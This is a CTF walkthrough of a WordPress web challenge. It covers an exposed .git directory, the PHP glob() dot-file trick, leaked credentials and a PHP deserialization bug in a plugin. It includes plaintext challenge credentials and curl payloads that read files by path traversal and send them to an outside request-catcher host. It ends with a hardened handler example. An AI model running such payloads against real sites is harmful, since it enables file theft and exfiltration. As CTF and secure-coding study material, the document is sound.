
[CTF] WU - Git Love

CTF InterCampus Ynov 2024

Difficulty Level : Hard

Challenge Category : Web

Description :

This time you must be a genius to find me! Keep your eyes open and don't miss any clue...

Solution Steps

  • Open the website; you will see a GitHub-style frontend.
  • Using dirb you can find /.git/, /wordpress and possibly /ftp. By accessing /.git/ you can download or browse the directory. Leave /wordpress and /ftp for now.
  • You may try multiple tools on the repository, but no luck: it is empty. However, the /.git/config file is interesting, because it contains the GitHub URL of the repo.
  • There is a note in /.git/description hinting at a hidden email directory (.email) on my websites, so by accessing /.email/ you should find my email downloader page.

  • You can find multiple emails there, but none of them is useful. A hint is found in the input placeholder, which says "email-*"; if you try that, multiple emails are downloaded! This means you can type a wildcard pattern that downloads several emails at once, and "*" downloads all of them. BUT, without any hassle, if you open the page source you will find a hint at the end saying ?source=?; obviously this is ?source=1, which shows you the source code of the page.
  • By analyzing the script you will find it uses PHP's glob() function. If you look it up, you will find that glob() does not match hidden (dot) files by default; you have to force it with the pattern ".*". This downloads the hidden email file ".antone.eml", which contains a message and a list of git commit hashes.
  • Since you know the GitHub link of the repo, you can look up the commits with the URL "github.com/USERNAME/REPO/commit/HASH". This is known to GitHub users, or you can find it by searching or by checking the single commit on that repo.
  • By testing all the hashes you will see different dangling commits containing rubbish data, except 2 hashes that contain a username:password. These are likely for the WordPress page!
  • Revisit /wordpress and try to log in at /wp-login (a known WordPress page) with the username and password you found.. cool! it worked!
  • However, the username says admin but the account is not an administrator; it is an editor instead. That's fine, you can still browse the posts/pages.
  • Open the posts in the admin dashboard /wp-admin; you will find multiple posts with rubbish data again. FINE! If you look around you will find a post in the trash, check that out!! Oh damn, it's a love story of Carl... read it (sorry about that, but it's interesting) and you will find the username and password of my FTP! But keep reading: there is a note saying my FTP can only be accessed from my /ftp page.
carl:FtpUsrCarl1337^^&*!
  • Enter my FTP. You only have access to wp-content, which has themes and plugins, and a flag.txt inside one of the plugins (superpowers) that can't be read. Open plugins because it is interesting; view the source code of superpowers and you will find a PHP deserialization!
  • By learning more about WordPress plugin actions, you will find admin-ajax.php, where you can post your payload calling the action of the superpowers plugin.
  • The plugin constructs a new instance of a class named in the user input, with a param and a URL. This hints at a file-reading class with a file path as the param and a URL to send the data to.
  • Use any request catcher service and send the following payload to get the data:
    curl -X POST -d "action=superpowers_handle&data=O:11:\"SuperPowers\":3:{s:5:\"clazz\";s:13:\"SplFileObject\";s:5:\"param\";s:42:\"../wp-content/plugins/superpowers/flag.txt\";s:3:\"url\";s:32:\"https://ayham.requestcatcher.com\";}" http://localhost/wordpress/wp-admin/admin-ajax.php
    You will not get the flag but another hint instead ;)
  • The real flag.txt is outside the wordpress folder, so the payload is:
    curl -X POST -d "action=superpowers_handle&data=O:11:\"SuperPowers\":3:{s:5:\"clazz\";s:13:\"SplFileObject\";s:5:\"param\";s:14:\"../../flag.txt\";s:3:\"url\";s:32:\"https://ayham.requestcatcher.com\";}" http://localhost/wordpress/wp-admin/admin-ajax.php
  • Note: keep in mind that admin-ajax.php is in /wp-admin, which is at the same level as wp-content, so the path to the flag must go up one directory first and then enter wp-content.
  • Check your request catcher.. GG!
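For comparison, here is how the superpowers handler described above could have been written so that the unserialize() bug is not there at all. This is an added example, not the challenge plugin's code; the handler name, the allowlist contents and the constructed inputs are assumptions.

```php
<?php
// Added example (not the challenge's plugin). Hypothetical handler that decodes
// a "clazz / param / url" request without ever calling unserialize().

// Only classes the feature genuinely needs may be instantiated (assumption:
// the feature only ever needed DateTime). SplFileObject is deliberately absent.
const SUPERPOWERS_ALLOWED_CLASSES = ['DateTime' => true];

// Returns ['ok' => bool, 'error' => string, 'clazz' => ?string, 'param' => ?string].
function superpowers_decode_request(string $raw): array
{
    // A PHP-serialized object ("O:11:...") is not valid JSON and is rejected;
    // only a JSON object with scalar fields is accepted, so no object graph
    // is ever rebuilt from attacker-controlled bytes.
    $req = json_decode($raw, true, 3);
    if (!is_array($req)) {
        return ['ok' => false, 'error' => 'body must be a JSON object', 'clazz' => null, 'param' => null];
    }
    $clazz = $req['clazz'] ?? null;
    $param = $req['param'] ?? null;
    if (!is_string($clazz) || !isset(SUPERPOWERS_ALLOWED_CLASSES[$clazz])) {
        return ['ok' => false, 'error' => 'class not allowed', 'clazz' => null, 'param' => null];
    }
    // Reject anything path-like: directory separators, "..", NUL bytes.
    if (!is_string($param) || preg_match('#[/\\\\\x00]|\.\.#', $param)) {
        return ['ok' => false, 'error' => 'invalid param', 'clazz' => null, 'param' => null];
    }
    // The "url" field is dropped entirely: the request must never tell the
    // server where to send data (that is what carried the flag out above).
    return ['ok' => true, 'error' => '', 'clazz' => $clazz, 'param' => $param];
}

// WordPress glue, only when loaded inside WordPress: nonce and capability
// check before the handler runs (real WordPress functions).
if (function_exists('add_action')) {
    add_action('wp_ajax_superpowers_handle', function () {
        check_ajax_referer('superpowers_nonce', 'nonce');
        if (!current_user_can('manage_options')) {
            wp_send_json_error('forbidden', 403);
        }
        $r = superpowers_decode_request((string) ($_POST['data'] ?? ''));
        $r['ok'] ? wp_send_json_success(['clazz' => $r['clazz']]) : wp_send_json_error($r['error'], 400);
    });
}

// Constructed inputs: the serialized shape from the writeup, a JSON request
// naming a forbidden class, and a benign request.
$serialized = 'O:11:"SuperPowers":3:{s:5:"clazz";s:13:"SplFileObject";s:5:"param";s:14:"../../flag.txt";s:3:"url";s:19:"https://example.com";}';
var_dump(superpowers_decode_request($serialized)['ok']);
var_dump(superpowers_decode_request('{"clazz":"SplFileObject","param":"x"}')['ok']);
var_dump(superpowers_decode_request('{"clazz":"DateTime","param":"2024-01-01"}')['ok']);
```

Run it from the command line with php: the serialized payload and the SplFileObject request are both rejected, and only the DateTime request is accepted.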